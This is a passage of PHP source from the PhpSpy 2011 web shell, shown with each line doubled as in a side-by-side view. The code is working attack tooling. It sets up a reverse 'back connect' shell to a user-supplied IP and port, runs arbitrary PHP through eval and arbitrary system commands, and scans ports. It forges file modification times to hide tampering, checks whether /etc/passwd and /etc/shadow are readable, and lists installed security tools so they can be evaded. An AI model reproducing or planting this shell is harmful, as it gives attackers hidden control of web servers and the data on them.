1281 cf('/tmp/angel_bc',$back_connect); 1281 cf('/tmp/angel_bc',$back_connect);
1282 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); 1282 $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1283 } else { 1283 } else {
1284 cf('/tmp/angel_bc.c',$back_connect_c); 1284 cf('/tmp/angel_bc.c',$back_connect_c);
1285 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); 1285 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1286 @unlink('/tmp/angel_bc.c'); 1286 @unlink('/tmp/angel_bc.c');
1287 $res = execute("/tmp/angel_bc $yourip $yourport &"); 1287 $res = execute("/tmp/angel_bc $yourip $yourport &");
1288 } 1288 }
1289 m("Now script try connect to $yourip port $yourport ..."); 1289 m("Now script try connect to $yourip port $yourport ...");
1290 } 1290 }
1291 1291
1292 formhead(array('title'=>'Back Connect')); 1292 formhead(array('title'=>'Back Connect'));
1293 makehide('action','backconnect'); 1293 makehide('action','backconnect');
1294 p('<p>'); 1294 p('<p>');
1295 p('Your IP:'); 1295 p('Your IP:');
1296 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); 1296 makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1297 p('Your Port:'); 1297 p('Your Port:');
1298 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); 1298 makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1299 p('Use:'); 1299 p('Use:');
1300 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); 1300 makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1301 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); 1301 makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1302 p('</p>'); 1302 p('</p>');
1303 formfoot(); 1303 formfoot();
1304}//end 1304}//end
1305 1305
1306elseif ($action == 'portscan') { 1306elseif ($action == 'portscan') {
1307 !$scanip && $scanip = '127.0.0.1'; 1307 !$scanip && $scanip = '127.0.0.1';
1308 !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958'; 1308 !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
1309 formhead(array('title'=>'Port Scan')); 1309 formhead(array('title'=>'Port Scan'));
1310 makehide('action','portscan'); 1310 makehide('action','portscan');
1311 p('<p>'); 1311 p('<p>');
1312 p('IP:'); 1312 p('IP:');
1313 makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip)); 1313 makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
1314 p('Port:'); 1314 p('Port:');
1315 makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport)); 1315 makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
1316 makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt')); 1316 makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
1317 p('</p>'); 1317 p('</p>');
1318 formfoot(); 1318 formfoot();
1319 1319
1320 if ($startscan) { 1320 if ($startscan) {
1321 p('<h2>Result &raquo;</h2>'); 1321 p('<h2>Result &raquo;</h2>');
1322 p('<ul class="info">'); 1322 p('<ul class="info">');
1323 foreach(explode(',', $scanport) as $port) { 1323 foreach(explode(',', $scanport) as $port) {
1324 $fp = @fsockopen($scanip, $port, $errno, $errstr, 1); 1324 $fp = @fsockopen($scanip, $port, $errno, $errstr, 1);
1325 if (!$fp) { 1325 if (!$fp) {
1326 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>'); 1326 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
1327 } else { 1327 } else {
1328 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>'); 1328 p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
1329 @fclose($fp); 1329 @fclose($fp);
1330 } 1330 }
1331 } 1331 }
1332 p('</ul>'); 1332 p('</ul>');
1333 } 1333 }
1334} 1334}
1335 1335
1336elseif ($action == 'eval') { 1336elseif ($action == 'eval') {
1337 $phpcode = trim($phpcode); 1337 $phpcode = trim($phpcode);
1338 if($phpcode){ 1338 if($phpcode){
1339 if (!preg_match('#<\?#si', $phpcode)) { 1339 if (!preg_match('#<\?#si', $phpcode)) {
1340 $phpcode = "<?php\n\n{$phpcode}\n\n?>"; 1340 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1341 } 1341 }
1342 eval("?".">$phpcode<?"); 1342 eval("?".">$phpcode<?");
1343 } 1343 }
1344 formhead(array('title'=>'Eval PHP Code')); 1344 formhead(array('title'=>'Eval PHP Code'));
1345 makehide('action','eval'); 1345 makehide('action','eval');
1346 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); 1346 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1347 p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>'); 1347 p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
1348 formfooter(); 1348 formfooter();
1349}//end eval 1349}//end eval
1350 1350
1351elseif ($action == 'editfile') { 1351elseif ($action == 'editfile') {
1352 if(file_exists($opfile)) { 1352 if(file_exists($opfile)) {
1353 $fp=@fopen($opfile,'r'); 1353 $fp=@fopen($opfile,'r');
1354 $contents=@fread($fp, filesize($opfile)); 1354 $contents=@fread($fp, filesize($opfile));
1355 @fclose($fp); 1355 @fclose($fp);
1356 $contents=htmlspecialchars($contents); 1356 $contents=htmlspecialchars($contents);
1357 } 1357 }
1358 formhead(array('title'=>'Create / Edit File')); 1358 formhead(array('title'=>'Create / Edit File'));
1359 makehide('action','file'); 1359 makehide('action','file');
1360 makehide('dir',$nowpath); 1360 makehide('dir',$nowpath);
1361 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); 1361 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1362 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); 1362 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1363 formfooter(); 1363 formfooter();
1364 1364
1365 goback(); 1365 goback();
1366 1366
1367}//end editfile 1367}//end editfile
1368 1368
1369elseif ($action == 'newtime') { 1369elseif ($action == 'newtime') {
1370 $opfilemtime = @filemtime($opfile); 1370 $opfilemtime = @filemtime($opfile);
1371 //$time = strtotime("$year-$month-$day $hour:$minute:$second"); 1371 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1372 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); 1372 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1373 formhead(array('title'=>'Clone folder/file was last modified time')); 1373 formhead(array('title'=>'Clone folder/file was last modified time'));
1374 makehide('action','file'); 1374 makehide('action','file');
1375 makehide('dir',$nowpath); 1375 makehide('dir',$nowpath);
1376 makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); 1376 makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1377 makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); 1377 makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1378 formfooter(); 1378 formfooter();
1379 formhead(array('title'=>'Set last modified')); 1379 formhead(array('title'=>'Set last modified'));
1380 makehide('action','file'); 1380 makehide('action','file');
1381 makehide('dir',$nowpath); 1381 makehide('dir',$nowpath);
1382 makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); 1382 makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1383 p('<p>year:'); 1383 p('<p>year:');
1384 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); 1384 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1385 p('month:'); 1385 p('month:');
1386 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); 1386 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1387 p('day:'); 1387 p('day:');
1388 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); 1388 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1389 p('hour:'); 1389 p('hour:');
1390 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); 1390 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1391 p('minute:'); 1391 p('minute:');
1392 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); 1392 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1393 p('second:'); 1393 p('second:');
1394 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); 1394 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1395 p('</p>'); 1395 p('</p>');
1396 formfooter(); 1396 formfooter();
1397 goback(); 1397 goback();
1398}//end newtime 1398}//end newtime
1399 1399
1400elseif ($action == 'shell') { 1400elseif ($action == 'shell') {
1401 if (IS_WIN && IS_COM) { 1401 if (IS_WIN && IS_COM) {
1402 if($program && $parameter) { 1402 if($program && $parameter) {
1403 $shell= new COM('Shell.Application'); 1403 $shell= new COM('Shell.Application');
1404 $a = $shell->ShellExecute($program,$parameter); 1404 $a = $shell->ShellExecute($program,$parameter);
1405 m('Program run has '.(!$a ? 'success' : 'fail')); 1405 m('Program run has '.(!$a ? 'success' : 'fail'));
1406 } 1406 }
1407 !$program && $program = 'c:\windows\system32\cmd.exe'; 1407 !$program && $program = 'c:\windows\system32\cmd.exe';
1408 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; 1408 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1409 formhead(array('title'=>'Execute Program')); 1409 formhead(array('title'=>'Execute Program'));
1410 makehide('action','shell'); 1410 makehide('action','shell');
1411 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); 1411 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1412 p('<p>'); 1412 p('<p>');
1413 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); 1413 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1414 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); 1414 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1415 p('</p>'); 1415 p('</p>');
1416 formfoot(); 1416 formfoot();
1417 } 1417 }
1418 formhead(array('title'=>'Execute Command')); 1418 formhead(array('title'=>'Execute Command'));
1419 makehide('action','shell'); 1419 makehide('action','shell');
1420 if (IS_WIN && IS_COM) { 1420 if (IS_WIN && IS_COM) {
1421 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); 1421 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1422 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); 1422 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1423 } 1423 }
1424 p('<p>'); 1424 p('<p>');
1425 makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command))); 1425 makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
1426 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); 1426 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1427 p('</p>'); 1427 p('</p>');
1428 formfoot(); 1428 formfoot();
1429 1429
1430 if ($command) { 1430 if ($command) {
1431 p('<hr width="100%" noshade /><pre>'); 1431 p('<hr width="100%" noshade /><pre>');
1432 if ($execfunc=='wscript' && IS_WIN && IS_COM) { 1432 if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1433 $wsh = new COM('WScript.shell'); 1433 $wsh = new COM('WScript.shell');
1434 $exec = $wsh->exec('cmd.exe /c '.$command); 1434 $exec = $wsh->exec('cmd.exe /c '.$command);
1435 $stdout = $exec->StdOut(); 1435 $stdout = $exec->StdOut();
1436 $stroutput = $stdout->ReadAll(); 1436 $stroutput = $stdout->ReadAll();
1437 echo $stroutput; 1437 echo $stroutput;
1438 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) { 1438 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1439 $descriptorspec = array( 1439 $descriptorspec = array(
1440 0 => array('pipe', 'r'), 1440 0 => array('pipe', 'r'),
1441 1 => array('pipe', 'w'), 1441 1 => array('pipe', 'w'),
1442 2 => array('pipe', 'w') 1442 2 => array('pipe', 'w')
1443 ); 1443 );
1444 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes); 1444 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1445 if (is_resource($process)) { 1445 if (is_resource($process)) {
1446 fwrite($pipes[0], $command."\r\n"); 1446 fwrite($pipes[0], $command."\r\n");
1447 fwrite($pipes[0], "exit\r\n"); 1447 fwrite($pipes[0], "exit\r\n");
1448 fclose($pipes[0]); 1448 fclose($pipes[0]);
1449 while (!feof($pipes[1])) { 1449 while (!feof($pipes[1])) {
1450 echo fgets($pipes[1], 1024); 1450 echo fgets($pipes[1], 1024);
1451 } 1451 }
1452 fclose($pipes[1]); 1452 fclose($pipes[1]);
1453 while (!feof($pipes[2])) { 1453 while (!feof($pipes[2])) {
1454 echo fgets($pipes[2], 1024); 1454 echo fgets($pipes[2], 1024);
1455 } 1455 }
1456 fclose($pipes[2]); 1456 fclose($pipes[2]);
1457 proc_close($process); 1457 proc_close($process);
1458 } 1458 }
1459 } else { 1459 } else {
1460 echo(execute($command)); 1460 echo(execute($command));
1461 } 1461 }
1462 p('</pre>'); 1462 p('</pre>');
1463 } 1463 }
1464}//end shell 1464}//end shell
1465 1465
1466elseif ($action == 'phpenv') { 1466elseif ($action == 'phpenv') {
1467 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; 1467 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1468 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); 1468 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1469 !$dis_func && $dis_func = 'No'; 1469 !$dis_func && $dis_func = 'No';
1470 $info = array( 1470 $info = array(
1471 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), 1471 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1472 2 => array('Server Domain',$_SERVER['SERVER_NAME']), 1472 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1473 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), 1473 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1474 4 => array('Server OS',PHP_OS), 1474 4 => array('Server OS',PHP_OS),
1475 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), 1475 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1476 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), 1476 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1477 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), 1477 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1478 8 => array('PHP run mode',strtoupper(php_sapi_name())), 1478 8 => array('PHP run mode',strtoupper(php_sapi_name())),
1479 9 => array('The file path',__FILE__), 1479 9 => array('The file path',__FILE__),
1480 1480
1481 10 => array('PHP Version',PHP_VERSION), 1481 10 => array('PHP Version',PHP_VERSION),
1482 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')), 1482 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
1483 12 => array('Safe Mode',getcfg('safe_mode')), 1483 12 => array('Safe Mode',getcfg('safe_mode')),
1484 13 => array('Administrator',$adminmail), 1484 13 => array('Administrator',$adminmail),
1485 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), 1485 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1486 15 => array('enable_dl',getcfg('enable_dl')), 1486 15 => array('enable_dl',getcfg('enable_dl')),
1487 16 => array('display_errors',getcfg('display_errors')), 1487 16 => array('display_errors',getcfg('display_errors')),
1488 17 => array('register_globals',getcfg('register_globals')), 1488 17 => array('register_globals',getcfg('register_globals')),
1489 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), 1489 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1490 19 => array('memory_limit',getcfg('memory_limit')), 1490 19 => array('memory_limit',getcfg('memory_limit')),
1491 20 => array('post_max_size',getcfg('post_max_size')), 1491 20 => array('post_max_size',getcfg('post_max_size')),
1492 21 => array('upload_max_filesize',$upsize), 1492 21 => array('upload_max_filesize',$upsize),
1493 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), 1493 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1494 23 => array('disable_functions',$dis_func), 1494 23 => array('disable_functions',$dis_func),
1495 ); 1495 );
1496 1496
1497 if($phpvarname) { 1497 if($phpvarname) {
1498 m($phpvarname .' : '.getcfg($phpvarname)); 1498 m($phpvarname .' : '.getcfg($phpvarname));
1499 } 1499 }
1500 1500
1501 formhead(array('title'=>'Server environment')); 1501 formhead(array('title'=>'Server environment'));
1502 makehide('action','phpenv'); 1502 makehide('action','phpenv');
1503 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); 1503 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1504 formfooter(); 1504 formfooter();
1505 1505
1506 $hp = array(0=> 'Server', 1=> 'PHP'); 1506 $hp = array(0=> 'Server', 1=> 'PHP');
1507 for($a=0;$a<2;$a++) { 1507 for($a=0;$a<2;$a++) {
1508 p('<h2>'.$hp[$a].' &raquo;</h2>'); 1508 p('<h2>'.$hp[$a].' &raquo;</h2>');
1509 p('<ul class="info">'); 1509 p('<ul class="info">');
1510 if ($a==0) { 1510 if ($a==0) {
1511 for($i=1;$i<=9;$i++) { 1511 for($i=1;$i<=9;$i++) {
1512 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>'); 1512 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1513 } 1513 }
1514 } elseif ($a == 1) { 1514 } elseif ($a == 1) {
1515 for($i=10;$i<=23;$i++) { 1515 for($i=10;$i<=23;$i++) {
1516 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>'); 1516 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1517 } 1517 }
1518 } 1518 }
1519 p('</ul>'); 1519 p('</ul>');
1520 } 1520 }
1521}//end phpenv 1521}//end phpenv
1522 1522
1523elseif ($action == 'secinfo') { 1523elseif ($action == 'secinfo') {
1524 1524
1525 secparam('Server software', @getenv('SERVER_SOFTWARE')); 1525 secparam('Server software', @getenv('SERVER_SOFTWARE'));
1526 secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); 1526 secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
1527 secparam('Open base dir', @ini_get('open_basedir')); 1527 secparam('Open base dir', @ini_get('open_basedir'));
1528 secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 1528 secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1529 secparam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 1529 secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1530 secparam('cURL support', function_exists('curl_version')?'enabled':'no'); 1530 secparam('cURL support', function_exists('curl_version')?'enabled':'no');
1531 $temp=array(); 1531 $temp=array();
1532 if(function_exists('mysql_get_client_info')) 1532 if(function_exists('mysql_get_client_info'))
1533 $temp[] = "MySql (".mysql_get_client_info().")"; 1533 $temp[] = "MySql (".mysql_get_client_info().")";
1534 if(function_exists('mssql_connect')) 1534 if(function_exists('mssql_connect'))
1535 $temp[] = "MSSQL"; 1535 $temp[] = "MSSQL";
1536 if(function_exists('pg_connect')) 1536 if(function_exists('pg_connect'))
1537 $temp[] = "PostgreSQL"; 1537 $temp[] = "PostgreSQL";
1538 if(function_exists('oci_connect')) 1538 if(function_exists('oci_connect'))
1539 $temp[] = "Oracle"; 1539 $temp[] = "Oracle";
1540 secparam('Supported databases', implode(', ', $temp)); 1540 secparam('Supported databases', implode(', ', $temp));
1541 1541
1542 if( !IS_WIN ) { 1542 if( !IS_WIN ) {
1543 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 1543 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1544 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); 1544 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1545 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 1545 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1546 secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no'); 1546 secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
1547 secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no'); 1547 secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
1548 secparam('OS version', @file_get_contents('/proc/version')); 1548 secparam('OS version', @file_get_contents('/proc/version'));
1549 secparam('Distr name', @file_get_contents('/etc/issue.net')); 1549 secparam('Distr name', @file_get_contents('/etc/issue.net'));
1550 $safe_mode = @ini_get('safe_mode'); 1550 $safe_mode = @ini_get('safe_mode');
1551 if(!$GLOBALS['safe_mode']) { 1551 if(!$GLOBALS['safe_mode']) {
1552 $temp=array(); 1552 $temp=array();
1553 foreach ($userful as $item) 1553 foreach ($userful as $item)
1554 if(which($item)){$temp[]=$item;} 1554 if(which($item)){$temp[]=$item;}
1555 secparam('Userful', implode(', ',$temp)); 1555 secparam('Userful', implode(', ',$temp));
1556 $temp=array(); 1556 $temp=array();
1557 foreach ($danger as $item) 1557 foreach ($danger as $item)
1558 if(which($item)){$temp[]=$item;} 1558 if(which($item)){$temp[]=$item;}
1559 secparam('Danger', implode(', ',$temp)); 1559 secparam('Danger', implode(', ',$temp));
1560 $temp=array(); 1560 $temp=array();
1561 foreach ($downloaders as $item) 1561 foreach ($downloaders as $item)
1562 if(which($item)){$temp[]=$item;} 1562 if(which($item)){$temp[]=$item;}
1563 secparam('Downloaders', implode(', ',$temp)); 1563 secparam('Downloaders', implode(', ',$temp));
1564 secparam('Hosts', @file_get_contents('/etc/hosts')); 1564 secparam('Hosts', @file_get_contents('/etc/hosts'));
1565 secparam('HDD space', execute('df -h')); 1565 secparam('HDD space', execute('df -h'));
1566 secparam('Mount options', @file_get_contents('/etc/fstab')); 1566 secparam('Mount options', @file_get_contents('/etc/fstab'));
1567 } 1567 }
1568 } else { 1568 } else {
1569 secparam('OS Version',execute('ver')); 1569 secparam('OS Version',execute('ver'));
1570 secparam('Account Settings',execute('net accounts')); 1570 secparam('Account Settings',execute('net accounts'));
1571 secparam('User Accounts',execute('net user')); 1571 secparam('User Accounts',execute('net user'));
1572 secparam('IP Configurate',execute('ipconfig -all')); 1572 secparam('IP Configurate',execute('ipconfig -all'));
1573 } 1573 }
1574}//end 1574}//end
1575 1575
1576else { 1576else {
1577 m('Undefined Action'); 1577 m('Undefined Action');
1578} 1578}
1579 1579
1580?> 1580?>
1581</td></tr></table> 1581</td></tr></table>
1582<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;"> 1582<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
1583 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span> 1583 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1584 Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved. 1584 Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
1585</div> 1585</div>
1586</body> 1586</body>
1587</html> 1587</html>
1588 1588
1589<?php 1589<?php
1590 1590
1591/*====================================================== 1591/*======================================================
1592函数库 1592函数库
1593======================================================*/ 1593======================================================*/
1594 1594
1595function secparam($n, $v) { 1595function secparam($n, $v) {
1596 $v = trim($v); 1596 $v = trim($v);
1597 if($v) { 1597 if($v) {
1598 p('<h2>'.$n.' &raquo;</h2>'); 1598 p('<h2>'.$n.' &raquo;</h2>');
1599 p('<div class="infolist">'); 1599 p('<div class="infolist">');
1600 if(strpos($v, "\n") === false) 1600 if(strpos($v, "\n") === false)
1601 p($v.'<br />'); 1601 p($v.'<br />');
1602 else 1602 else
1603 p('<pre>'.$v.'</pre>'); 1603 p('<pre>'.$v.'</pre>');
1604 p('</div>'); 1604 p('</div>');
1605 } 1605 }
1606} 1606}
1607function m($msg) { 1607function m($msg) {
1608 echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">'; 1608 echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
1609 echo $msg; 1609 echo $msg;
1610 echo '</div>'; 1610 echo '</div>';
1611} 1611}
1612function scookie($key, $value, $life = 0, $prefix = 1) { 1612function scookie($key, $value, $life = 0, $prefix = 1) {
1613 global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife; 1613 global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
1614 $key = ($prefix ? $cookiepre : '').$key; 1614 $key = ($prefix ? $cookiepre : '').$key;
1615 $life = $life ? $life : $cookielife; 1615 $life = $life ? $life : $cookielife;
1616 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; 1616 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1617 setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport); 1617 setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
1618} 1618}
1619function multi($num, $perpage, $curpage, $tablename) { 1619function multi($num, $perpage, $curpage, $tablename) {
1620 $multipage = ''; 1620 $multipage = '';
1621 if($num > $perpage) { 1621 if($num > $perpage) {
1622 $page = 10; 1622 $page = 10;
1623 $offset = 5; 1623 $offset = 5;
1624 $pages = @ceil($num / $perpage); 1624 $pages = @ceil($num / $perpage);
1625 if($page > $pages) { 1625 if($page > $pages) {
1626 $from = 1; 1626 $from = 1;
1627 $to = $pages; 1627 $to = $pages;
1628 } else { 1628 } else {
1629 $from = $curpage - $offset; 1629 $from = $curpage - $offset;
1630 $to = $curpage + $page - $offset - 1; 1630 $to = $curpage + $page - $offset - 1;
1631 if($from < 1) { 1631 if($from < 1) {
1632 $to = $curpage + 1 - $from; 1632 $to = $curpage + 1 - $from;
1633 $from = 1; 1633 $from = 1;
1634 if(($to - $from) < $page && ($to - $from) < $pages) { 1634 if(($to - $from) < $page && ($to - $from) < $pages) {
1635 $to = $page; 1635 $to = $page;
1636 } 1636 }
1637 } elseif($to > $pages) { 1637 } elseif($to > $pages) {
1638 $from = $curpage - $pages + $to; 1638 $from = $curpage - $pages + $to;
1639 $to = $pages; 1639 $to = $pages;
1640 if(($to - $from) < $page && ($to - $from) < $pages) { 1640 if(($to - $from) < $page && ($to - $from) < $pages) {
